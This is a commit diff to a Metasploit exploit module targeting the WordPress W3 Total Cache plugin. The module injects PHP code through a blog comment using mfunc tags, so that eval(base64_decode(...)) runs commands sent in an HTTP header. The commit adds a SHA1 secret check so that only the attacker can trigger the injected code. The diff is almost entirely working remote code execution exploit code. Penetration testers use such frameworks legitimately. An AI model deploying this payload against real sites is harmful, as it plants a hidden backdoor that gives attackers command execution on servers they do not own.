Add sha1 sum check to allow execution

Author: jvazquez-r7

modules/exploits/unix/webapp/php_wordpress_total_cache.rb

@@ -27,7 +27,8 @@ def initialize(info = {})
 			'Author'	=>
 				[
 					'Unknown', # Vulnerability discovery
-					'juan vazquez' # Metasploit module
+					'juan vazquez', # Metasploit module
+					'Christian Mehlmauer' # Metasploit module
 				],
 			'License'        => MSF_LICENSE,
 			'References'     =>
@@ -102,7 +103,7 @@ def login
 	end
 
 	def post_comment
-		php_payload = "<!--mfunc eval(base64_decode($_SERVER[HTTP_CMD])); --><!--/mfunc-->"
+		php_payload = "<!--mfunc if (sha1($_SERVER[HTTP_SUM]) == '#{@sum}' ) { eval(base64_decode($_SERVER[HTTP_CMD])); } --><!--/mfunc-->"
 
 		vars_post = {
 			'comment' => php_payload,
@@ -148,6 +149,9 @@ def exploit
 			print_status("#{peer} - Trying unauthenticated exploitation...")
 		end
 
+		random_test = rand_text_alpha(4096)
+		@sum = Rex::Text.sha1(random_test)
+
 		print_status("#{peer} - Injecting the PHP Code throw a comment...")
 		post_uri = post_comment
 		if post_uri.nil?
@@ -159,7 +163,8 @@ def exploit
 			'method' => 'GET',
 			'uri'    => post_uri,
 			'headers' => {
-				'Cmd' => Rex::Text.encode_base64(payload.encoded)
+				'Cmd' => Rex::Text.encode_base64(payload.encoded),
+				'Sum' => random_test
 			}
 		}
 		options.merge!({'cookie' => "#{@cookie_name}=#{@cookie_value}"}) if @auth